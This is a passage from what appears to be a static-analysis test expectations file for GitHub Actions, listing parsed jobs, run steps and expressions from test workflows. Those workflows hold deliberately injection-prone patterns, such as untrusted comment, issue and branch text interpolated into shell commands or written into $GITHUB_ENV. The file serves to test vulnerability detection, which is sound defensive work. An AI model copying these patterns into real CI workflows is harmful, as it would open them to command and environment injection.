$GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| 
.github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| 
.github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| 
.github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | +| 
.github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | +| .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | +| .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | +| .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | +| .github/workflows/shell.yml:12:14:12:23 | echo "foo" | +| .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | +| .github/workflows/shell.yml:18:14:18:23 | echo "foo" | +| .github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/shell.yml:22:9:22:32 | Run Step | +| .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| 
.github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +argumentNodes +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +usesIds +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | step | +nodeLocations +| .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | .github/workflows/commands.yml:9:5:31:2 | .github/workflows/commands.yml@9:5:31:2 | +| .github/workflows/commands.yml:15:9:18:6 | Run Step | .github/workflows/commands.yml:15:9:18:6 | .github/workflows/commands.yml@15:9:18:6 | +| .github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | .github/workflows/commands.yml:16:14:17:30 | .github/workflows/commands.yml@16:14:17:30 | +| .github/workflows/commands.yml:18:9:20:6 | Run Step | .github/workflows/commands.yml:18:9:20:6 | 
.github/workflows/commands.yml@18:9:20:6 | +| .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | .github/workflows/commands.yml:18:14:19:30 | .github/workflows/commands.yml@18:14:19:30 | +| .github/workflows/commands.yml:20:9:22:6 | Run Step | .github/workflows/commands.yml:20:9:22:6 | .github/workflows/commands.yml@20:9:22:6 | +| .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | .github/workflows/commands.yml:20:14:21:33 | .github/workflows/commands.yml@20:14:21:33 | +| .github/workflows/commands.yml:22:9:24:6 | Run Step | .github/workflows/commands.yml:22:9:24:6 | .github/workflows/commands.yml@22:9:24:6 | +| .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | .github/workflows/commands.yml:22:14:23:31 | .github/workflows/commands.yml@22:14:23:31 | +| .github/workflows/commands.yml:24:9:26:6 | Run Step | .github/workflows/commands.yml:24:9:26:6 | .github/workflows/commands.yml@24:9:26:6 | +| .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | .github/workflows/commands.yml:24:14:25:32 | .github/workflows/commands.yml@24:14:25:32 | +| .github/workflows/commands.yml:26:9:28:6 | Run Step | .github/workflows/commands.yml:26:9:28:6 | .github/workflows/commands.yml@26:9:28:6 | +| .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | .github/workflows/commands.yml:26:14:27:34 | .github/workflows/commands.yml@26:14:27:34 | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | .github/workflows/commands.yml:28:9:31:2 | .github/workflows/commands.yml@28:9:31:2 | +| .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | .github/workflows/commands.yml:28:14:29:50 | .github/workflows/commands.yml@28:14:29:50 | +| .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | .github/workflows/commands.yml:32:5:39:30 | .github/workflows/commands.yml@32:5:39:30 | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | 
.github/workflows/commands.yml:34:9:37:6 | .github/workflows/commands.yml@34:9:37:6 | +| .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | .github/workflows/commands.yml:35:14:36:30 | .github/workflows/commands.yml@35:14:36:30 | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | .github/workflows/commands.yml:37:9:39:30 | .github/workflows/commands.yml@37:9:39:30 | +| .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | .github/workflows/commands.yml:38:14:39:30 | .github/workflows/commands.yml@38:14:39:30 | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:5:5:21:47 | .github/workflows/expression_nodes.yml@5:5:21:47 | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:8:6 | .github/workflows/expression_nodes.yml@7:9:8:6 | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:14:7:58 | .github/workflows/expression_nodes.yml@7:14:7:58 | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:27:7:58 | .github/workflows/expression_nodes.yml@7:27:7:58 | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:10:6 | .github/workflows/expression_nodes.yml@8:9:10:6 | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:14:9:57 | .github/workflows/expression_nodes.yml@8:14:9:57 | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:9:25:9:56 | .github/workflows/expression_nodes.yml@9:25:9:56 | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:13:6 | 
.github/workflows/expression_nodes.yml@10:9:13:6 | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:14:12:53 | .github/workflows/expression_nodes.yml@10:14:12:53 | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:11:25:11:56 | .github/workflows/expression_nodes.yml@11:25:11:56 | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:12:24:12:51 | .github/workflows/expression_nodes.yml@12:24:12:51 | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:16:6 | .github/workflows/expression_nodes.yml@13:9:16:6 | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:14:15:46 | .github/workflows/expression_nodes.yml@13:14:15:46 | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:20:6 | .github/workflows/expression_nodes.yml@16:9:20:6 | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:14:19:57 | .github/workflows/expression_nodes.yml@16:14:19:57 | +| .github/workflows/expression_nodes.yml:17:25:17:56 
| github.event.comment.body | .github/workflows/expression_nodes.yml:17:25:17:56 | .github/workflows/expression_nodes.yml@17:25:17:56 | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:18:24:18:51 | .github/workflows/expression_nodes.yml@18:24:18:51 | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:19:24:19:55 | .github/workflows/expression_nodes.yml@19:24:19:55 | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:21:47 | .github/workflows/expression_nodes.yml@20:9:21:47 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | .github/workflows/multiline2.yml:9:5:89:35 | .github/workflows/multiline2.yml@9:5:89:35 | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | .github/workflows/multiline2.yml:11:9:15:6 | .github/workflows/multiline2.yml@11:9:15:6 | +| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:30:14:33:14 | .github/workflows/multiline2.yml@30:14:33:14 | +| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline2.yml:32:13:32:39 | .github/workflows/multiline2.yml@32:13:32:39 | +| 
.github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:34:9:40:6 | .github/workflows/multiline2.yml@34:9:40:6 | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:35:14:39:14 | .github/workflows/multiline2.yml@35:14:39:14 | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:40:9:46:6 | .github/workflows/multiline2.yml@40:9:46:6 | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:41:14:45:14 | .github/workflows/multiline2.yml@41:14:45:14 | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:46:9:52:6 | .github/workflows/multiline2.yml@46:9:52:6 | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:47:14:51:14 | .github/workflows/multiline2.yml@47:14:51:14 | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:52:9:58:6 | .github/workflows/multiline2.yml@52:9:58:6 | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:53:14:57:14 | .github/workflows/multiline2.yml@53:14:57:14 | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:58:9:63:6 | .github/workflows/multiline2.yml@58:9:63:6 | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:59:14:62:14 | .github/workflows/multiline2.yml@59:14:62:14 | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:63:9:66:6 | .github/workflows/multiline2.yml@63:9:66:6 | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| 
grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:64:14:65:142 | .github/workflows/multiline2.yml@64:14:65:142 | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:66:9:71:6 | .github/workflows/multiline2.yml@66:9:71:6 | +| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:14:14:48 | .github/workflows/multiline.yml@11:14:14:48 | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:9:20:6 | .github/workflows/multiline.yml@15:9:20:6 | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:14:19:40 | .github/workflows/multiline.yml@15:14:19:40 | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:9:24:6 | .github/workflows/multiline.yml@20:9:24:6 | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:14:23:40 | .github/workflows/multiline.yml@20:14:23:40 | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:9:30:6 | .github/workflows/multiline.yml@24:9:30:6 | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:14:29:29 | .github/workflows/multiline.yml@24:14:29:29 | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:30:9:34:6 | .github/workflows/multiline.yml@30:9:34:6 | +| .github/workflows/multiline.yml:30:14:33:14 | cat 
<<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:14:33:14 | .github/workflows/multiline.yml@30:14:33:14 | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:32:13:32:39 | .github/workflows/multiline.yml@32:13:32:39 | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:34:9:40:6 | .github/workflows/multiline.yml@34:9:40:6 | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:35:14:39:14 | .github/workflows/multiline.yml@35:14:39:14 | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:40:9:46:6 | .github/workflows/multiline.yml@40:9:46:6 | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:41:14:45:14 | .github/workflows/multiline.yml@41:14:45:14 | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:46:9:52:6 | .github/workflows/multiline.yml@46:9:52:6 | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:47:14:51:14 | .github/workflows/multiline.yml@47:14:51:14 | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:52:9:58:6 | .github/workflows/multiline.yml@52:9:58:6 | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:53:14:57:14 | .github/workflows/multiline.yml@53:14:57:14 | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:58:9:63:6 | .github/workflows/multiline.yml@58:9:63:6 | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:59:14:62:14 | 
.github/workflows/multiline.yml@59:14:62:14 | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:63:9:66:6 | .github/workflows/multiline.yml@63:9:66:6 | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:64:14:65:136 | .github/workflows/multiline.yml@64:14:65:136 | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:66:9:71:6 | .github/workflows/multiline.yml@66:9:71:6 | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:67:14:70:36 | .github/workflows/multiline.yml@67:14:70:36 | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:71:9:78:6 | .github/workflows/multiline.yml@71:9:78:6 | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:72:14:77:29 | .github/workflows/multiline.yml@72:14:77:29 | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:78:9:85:6 | .github/workflows/multiline.yml@78:9:85:6 | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:79:14:84:29 | .github/workflows/multiline.yml@79:14:84:29 | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:9:89:29 | .github/workflows/multiline.yml@85:9:89:29 | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:86:14:89:29 | .github/workflows/multiline.yml@86:14:89:29 | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:46:111 | 
.github/workflows/poisonable_steps.yml@5:5:46:111 | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:9:8:6 | .github/workflows/poisonable_steps.yml@7:9:8:6 | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:14:7:30 | .github/workflows/poisonable_steps.yml@7:14:7:30 | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:8:9:13:6 | .github/workflows/poisonable_steps.yml@8:9:13:6 | +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | .github/workflows/poisonable_steps.yml:11:53:11:75 | .github/workflows/poisonable_steps.yml@11:53:11:75 | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:13:9:14:6 | .github/workflows/poisonable_steps.yml@13:9:14:6 | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:13:14:13:32 | .github/workflows/poisonable_steps.yml@13:14:13:32 | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:14:9:15:6 | .github/workflows/poisonable_steps.yml@14:9:15:6 | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:14:14:14:42 | .github/workflows/poisonable_steps.yml@14:14:14:42 | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:15:9:16:6 | .github/workflows/poisonable_steps.yml@15:9:16:6 | +| 